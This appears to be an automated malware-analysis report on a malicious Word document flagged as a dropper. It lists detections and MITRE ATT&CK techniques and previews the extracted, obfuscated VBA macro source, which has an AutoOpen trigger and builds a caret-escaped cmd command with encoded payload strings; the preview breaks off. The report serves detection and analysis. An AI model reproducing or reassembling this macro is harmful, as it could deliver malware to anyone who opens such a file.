MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
The file contains a VBA macro with an AutoOpen function, which is a common technique for malicious documents. The macro utilizes a Shell() call to execute a command-line utility. This utility appears to be designed to download and execute a second-stage payload, as indicated by the reconstructed command string 'md /V /C set 5KoY=AAC'. The ClamAV detection name 'Doc.Dropper.Sagent-6667985-0' further supports its role as a dropper.
Heuristics 6
-
ClamAV: Doc.Dropper.Sagent-6667985-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Sagent-6667985-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9475 bytes |
SHA-256: d6897d4e5f735c83b834dc7860b86c4ad6ac4b002aabc5e9f97efea74cc86b0a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ZrnDJfirlOumq" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "bHhJoJVkjaA" Function MRvkQL() On _ Error _ Resume _ Next Hour 18813 * rDzaa / sRdkb * 56990 Hour 52298 / brvId Hour 98170 / 5979 Hour 93826 / lLlIb Hour 58048 * PSTzAY rnwIiB = "md" + " /" + "V/C" + Chr(4 + 1 + 3 + 5 + 21) + "^" + "s^et ^" + "5K^oY=" + "AAC" Hour zufTJ / sPiiNJ * HHGrtK / XmIbC Hour rSVVX * ipdRV LKbZwRbqKVT = "A^g^A" + "AIAAC^A" + "gA^AI" + "^AACA" + "^" + "g^AA" + "I^A^AC^" + "A^gA^A^" + "I^AAC^" + "A^gA^" + "A^I^" + "AAC^A" + "gA^Q" Hour lYKDqL * DRvqlz Hour SjOWd * IoHLnw Hour 13847 / zZJaC Hour Ejhmi / Liolid MiGGcwqb = "fA^0H^A" + "7^BA^a" + "^A^M^G^" + "A0" + "^B^Q" + "Y^AMG^A" + "^9^B" + "w^OAs" + "GA" + "hBQ^Z^A" + "IH^A^iB" Hour ZTfBNZ * FLWcu / wLIsq / jQPVA Hour 85837 * XkDcFJ / 79039 * atVSIh Hour 83767 / KkjLBw / 45172 * JnOPT Hour 77815 / HcFDcV OADXutEzck = "^wO" + "^A^w^" + "GAN^" + "BQb^AQ" + "C^A^gAQ" + "^b^" + "A^U" + "^G^A^0" + "^B^Q^" + "S" Hour GZnwdG / 36176 Hour 53 / rizjzQ / juVdiN * SaiSJ zToUJvniTO = "^A" + "0C^" + "A" + "l^B^" + "w^aA8G" Hour 8551 / GRfzK Hour 24529 / CUlFJk * 39266 / QjUbX Hour GLIALI * TzmTA / 36107 * ZPflB uUAHjhCm = "^A2B^g" + "bAkE" + "^A^7A^Q" + "K" + "^Aw" + "GAN^B" + "Q" + "^b^A^" + "QC" + "A^gA" + "^ALA" Hour 13143 / SwpVnj Hour 69242 / 3376 Hour GjXNb * wnhaIo TQcOjvoL = "Q^E^A^0" + "Bg^e" + "^A^QC^" + "Ao^" + "A^QZ^" + "Aw^" + "G" + "Ap^B^" + "gR" + "AQGA" + "h" Hour NGiihh / zOPJzS Hour 59246 * HNVrIj JHVRhm = "Bw" + "bA^w^G^" + "AuB^" + "w^" + "d^A8^G" + "^" + "AE^B" + "^g^L^A" + "MHA" + "tBAVAQ" + "CA^7^B" + "^Q^e^" MRvkQL = rnwIiB + LKbZwRbqKVT + MiGGcwqb + OADXutEzck + zToUJvniTO + uUAHjhCm + TQcOjvoL + JHVRhm Hour pZZPv / 40997 End Function Function umRtWz() On _ Error _ Resume _ Next Hour QvNzCj * jhsEO / 61338 * Cbswj Hour FPzcY * NnrHnw * 40361 * qLWoTo Hour 83245 / HIPBTa * 37186 * hHXXw Hour PfTFR * jIVFsG / 75331 / wwmnv TiENB = "AI" + "^HA0^B^" + "w^e^A" + "kC" + "^Ar^" + "B^Q" + "^T" + "^AcEA^k" + "A^" + "AI" + "A^4^" + "GA^p" + "BAI^A^" Hour 35269 / uUXuj Hour PrvAji * BWPhvJ Hour 330 * jPYKz * ITSUmh * 74136 TYuYZakJlKs = "Q^EA0^B" + "g^e" + "A^Q" + "C^A^oA" + "A^a" + "A^M^" + "G^" Hour qYpWT / SFCJu / 82951 / 58160 Hour 84463 / HkpKai Hour MwwJiW * NUBRKJ Hour 81561 / wTiAG * YZVJu / LFjDRI PipfGatdikZ = "AhB" + "^QZ^A" + "^I^" + "H" + "AvBg^" + "Z" + "AsD^An" + "A" + "Q^" + "ZA^" + "g^" Hour 18793 / FTzki / LUUCG * HKRnG Hour ViqRT / DDBFwL * 42049 / amYIz Hour 80361 * TXMPCG JvHqUX = "H^A^l" + "^" + "BgL^AcC" + "^Ar^" + "A^w" + "Y" + "^A" + "cFAw" + "BA^" + "J" + "^A^s" Hour 4094 / tbLJOW Hour 70526 / jXtfH * 58387 / GZCmk Hour 28709 / nijjM / 25640 / bwQcoo VMrINN = "C^An^A" + "A^X^AcC" + "Ar^" + "A" + "^w^" + "Y^A^k^" + "G^A^s" Hour 81619 * iCutL * 73703 * WcGjk iTTaXWKbA = "Bg" + "Y" + "A^UHAwB" + "^g" + "^O^A" + "Y^" + "H^A^" + "uBQZ^" + "AQCA9" Hour nwafq / wpmLh * 29355 / PvlkU zlhazp = "^AA^b" + "^A^" + "0^EA" + "^t" + "BAJA^s" + "D^An^A^" + "A" + "MAUD^A" + "2A^" + "wJA^ACA" + "^9^" + "A" Hour 37630 * qwuzXD ulCQUSP = "AIA" + "MGA^" + "X^B^Ac^" + "A^" + "QC" Hour 70925 * dtorif / aQJEYU * CGpIRX Hour 32444 * 42522 * vQATnI / CaJbpZ Hour Bilzlh * AFiNH * iXMGjV / PBKzqH FioFZrj = "^A7A^Q^" + "K^AcCAA" + "Bw^" + "JAgC^" + "A0^B" + "Q^aAw^" + "GAwB^wU" + "A^4" Hour 8087 * WJwOf * 33573 / HfBzLX Hour lmqXRb / DIrAzN tXYTDWbJh = "C" + "^An" + "^A" + "^QSA" + "^MEA" + "^y^B^" + "g" + "^b^A8" + "CA^4" Hour 85626 * FqzBMk / 11484 / vQHQz Hour FSlAa / OTVzLw / ipNFO * QSpTU Hour 66347 / PdjfuK / 51671 / ubDmXu DUnhRKD = "B^Q^b" + "A" + "4CA^tB" + "w^b^A^" + "MG^A^" + "u^AA^Z^" + "AUGA^y" umRtWz = TiENB + TYuYZakJlKs + PipfGatdikZ + JvHq ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.